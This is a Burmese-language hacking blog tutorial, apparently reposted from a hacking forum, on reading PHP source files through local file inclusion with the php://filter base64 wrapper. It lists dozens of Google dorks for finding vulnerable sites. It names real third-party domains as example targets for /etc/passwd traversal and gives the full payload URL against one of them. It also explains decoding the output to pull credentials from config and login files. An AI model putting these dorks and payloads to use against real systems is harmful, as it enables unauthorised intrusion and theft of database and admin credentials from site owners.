Thursday, April 26, 2012

LFI with php://filter



ဒီပိုစ့္ေလးဟာ LFI ေပၚမွာဆင့္ကဲေျပာင္းလဲထားတာျဖစ္ျပီးေတာ့ BASE 64 php filter ကိုအသံုးျပဳမွာျဖစ္ပါတယ္....။ဆာဗာမွာရိွတဲ့ connect.php / config.php / index.php လိုမ်ိဳး php ဖိုင္ ေတြကိုျမင္ေတြ႕ႏိုင္မွာျဖစ္ပါတယ္...။
ပထမဆံုးေအာက္ပါ LFI Dorks ေတြကိုသံုးျပီး LFI vulnerable sites ေတြကိုရွာပါ...။

inurl:index.php?page=index.php
inurl:index.php?page=sitemap.php
inurl:index.php?page=awards.php
inurl:index.php?page=book.php
inurl:index.php?page=store.php
inurl:index.php?page=items.php
inurl:index.php?page=feedback.php
inurl:index.php?page=welcome.php
inurl:index.php?page=advertise.php
inurl:index.php?page=festival.php
inurl:index.php?page=band.php
inurl:index.php?page=musicians.php
inurl:index.php?page=artist.php
inurl:index.php?page=archive.php
inurl:index.php?page=facilities.php
inurl:index.php?page=activies.php
inurl:index.php?page=bio.php
inurl:index.php?page=biography.php
inurl:index.php?page=menu.php
inurl:index.php?page=profile.php
inurl:index.php?page=terms.php
inurl:index.php?page=tos.php
inurl:index.php?page=screenshots.php
inurl:index.php?page=plans.php
inurl:index.php?page=templates.php
inurl:index.php?page=browse.php
inurl:index.php?page=shows.php
inurl:index.php?page=dining.php
inurl:index.php?page=media.php
inurl:index.php?page=offers.php
inurl:index.php?page=photogallery.php
inurl:index.php?page=schools.php
inurl:index.php?page=rates.php
inurl:index.php?page=buy.php
inurl:index.php?page=pricing.php
inurl:index.php?page=web.php
inurl:index.php?page=cms.php
inurl:index.php?page=sponsors.php
inurl:index.php?page=login.php
inurl:index.php?page=admin.php
inurl:index.php?page=register.php
inurl:index.php?page=signin.php
inurl:index.php?page=signup.php
inurl:index.php?page=artikel.php
inurl:index.php?page=kontakt.php
inurl:index.php?page=directions.php
inurl:index.php?page=farm.php
inurl:index.php?page=resume.php
inurl:index.php?page=products.php
inurl:index.php?page=music.php
inurl:index.php?page=agenda.php
inurl:index.php?page=faculty.php
inurl:index.php?page=overview.php
inurl:index.php?page=research.php
inurl:index.php?page=publications.php
inurl:index.php?page=outreach.php
inurl:index.php?page=education.php
inurl:index.php?page=regulatoins.php

ေအာက္ေဖၚျပပါဆိုက္ေတြကို ဥပမာအျဖစ္သံုးႏိုင္ပါသည္........။

http://www.evoca.ch/index.php?page=../etc/passwd
http://www.moto-plus.net/index.php?Page ... etc/passwd
http://www.maxparts.ru/index.php?page=/etc/passwd
http://www.die-drid.de/index.php?mod=ko ... etc/passwd
http://www.sdhpardubice.cz/index.php?page=/etc/passwd
http://www.lc-bensberg-schloss.de/index ... etc/passwd
http://www.misbrugscenterherning.dk/ind ... etc/passwd
==========================================
ဥပမာအေနနဲ႕ ေအာက္ေဖၚျပပါ URL ကိုသံုးထားပါသည္။
http://modelspromo.com/index.php?page=/etc/passwd 

ျပီးရင္ ?page= ဆိုတဲ့ေနာက္မွာ ေအာက္ေဖၚျပပါ ကုတ္မ်ားကိုေပါင္းထည့္ေပးပါ.....။

php://filter/convert.base64-encode/resource=index.php
============================================
ေအာက္ပါပံုစံအတိုင္း ျဖစ္ပါသည္..........။

http://modelspromo.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
သင့္ browser ထဲမွာေအာက္ပါအတိုင္း ျမင္ေတြ႕ရပါလိမ့္မည္........။ပံုမျမင္ရလွ်င္ ကလစ္ေထာက္ျပီးၾကည့္ပါ...။

ျမင္ေတြ႕ရေသာကုတ္မ်ားကို ကူးယူလိုက္ပါ..။ေအာက္ပါလိုေပါ့........။
PD9waHAKCnNlc3Npb25fc3RhcnQoKTsKCmlmKCRfR0VUWydwYWdlJ109PSIiKSAkcGFnZSA9ICJo ... ..... etc 
ျပီးရင္ http://www.crypo.com/tools/eng_base64d.php ကို သြာျပီး paste လုပ္လိုက္ပါ......။
ပံုမွန္အတိုင္းဆိုလွ်င္ index.php
source ေတြကိုမျမင္ရပါဘူး............
ျပီးရင္ decrypt ကိုကလစ္ပါ....အခုဆိုရင္ကၽြန္ေတာ္တို႕ index.php ရဲ႕ source code ေတြကိုျမင္ရပါျပီ...။


connection.php / config.php / configuration.php / configure.php / connect.php ..etc မ်ားတြင္
Data အမ်ားစုကိုထားတတ္ၾကပါသည္....။
တကယ့္ တကယ္ tutorial က ဘာမွ မဟုတ္ဘူးး.. ေရးထားတာကေတာ့ အရွည္ၾကီးပဲ ဟီးးး
အတိုခ်ဳပ္ေျပာရရင္
LFI ေပါက္တဲ့ ေနရာမွာ ဒီ codes
php://filter/convert.base64-encode/resource=index.php
ေလး နဲ႕ php codes ေတြ hack ပီး ၾကည့္တာ
index.php အစား ၾကိဳက္တာ ၾကည့္ေပါ့ login.php တို႕ admin.php တို႕ ဘာညာကြိကြ ...
ကံေကာင္းရင္ username password ေတြရမယ္ :)........

Tuto By
source from mmhackforums.noonhost.com

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

Print Friendly and PDF

HOW IS MY SITE?

Powered by Blogger.

Blog Archive

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology